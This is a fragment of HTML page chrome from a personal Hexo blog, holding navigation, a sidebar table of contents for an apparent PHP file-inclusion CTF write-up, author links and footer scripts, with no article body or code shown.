href="/2021/11/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">命令执行-文件包含</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/11/07/badmac/"><span class="paginator-prev__text">badmac</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Contenido</span><span class="sidebar-nav-ov">Reseña</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%A8%E6%AF%94"><span class="toc-number">1.</span> <span class="toc-text">
          笨比</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8E%9F%E7%90%861"><span class="toc-number">2.</span> <span class="toc-text">
          原理1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">2.1.</span> <span class="toc-text">
          1.临时文件包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-session-upload-progress%E4%B8%8ESession%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">2.2.</span> <span class="toc-text">
          2.session.upload_progress与Session文件包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-session-upload-progress"><span class="toc-number">2.2.1.</span> <span class="toc-text">
          1.session.upload_progress</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86%E4%B8%8E%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.2.2.</span> <span class="toc-text">
          2.利用原理与条件</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B01"><span class="toc-number">3.</span> <span class="toc-text">
          实现1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#cookies-%E2%80%98PHPSESSID%E2%80%99-flag"><span class="toc-number">3.1.</span> <span class="toc-text">
          cookies&#x3D;{‘PHPSESSID’: flag},</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#data"><span class="toc-number">3.2.</span> <span class="toc-text">
          data</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81"><span class="toc-number">3.3.</span> <span class="toc-text">
          验证</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8E%9F%E7%90%862"><span class="toc-number">4.</span> <span class="toc-text">
          原理2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#pear-pecl%E3%80%81"><span class="toc-number">4.0.1.</span> <span class="toc-text">
          pear&#x2F;pecl、</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E4%B8%9C%E8%A5%BF"><span class="toc-number">4.0.1.1.</span> <span class="toc-text">
          什么东西</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="toc-number">4.0.1.2.</span> <span class="toc-text">
          利用条件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">4.0.1.3.</span> <span class="toc-text">
          利用方法</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-config-create"><span class="toc-number">4.0.1.3.1.</span> <span class="toc-text">
          1.config-create</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-SERVER-%E2%80%98argv%E2%80%99"><span class="toc-number">4.0.1.3.2.</span> <span class="toc-text">
          2.$_SERVER[‘argv’]</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-payload"><span class="toc-number">4.0.1.3.3.</span> <span class="toc-text">
          3.payload</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%94%B6%E8%8E%B7%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">
          收获：</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/6.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">↑在现场，我是兔子🐰</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/Biscuit19" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="Biscuit19_" target="_blank" rel="noopener" data-popover="Wechat" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="https://user.qzone.qq.com/911268514/main" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">4</div><div class="sidebar-ov-state-item__name">Archivo</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Categorías</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">Etiquetas</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">Has leído </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Biscuit19_</span></div><div><span>Potenciado por <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Tema - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>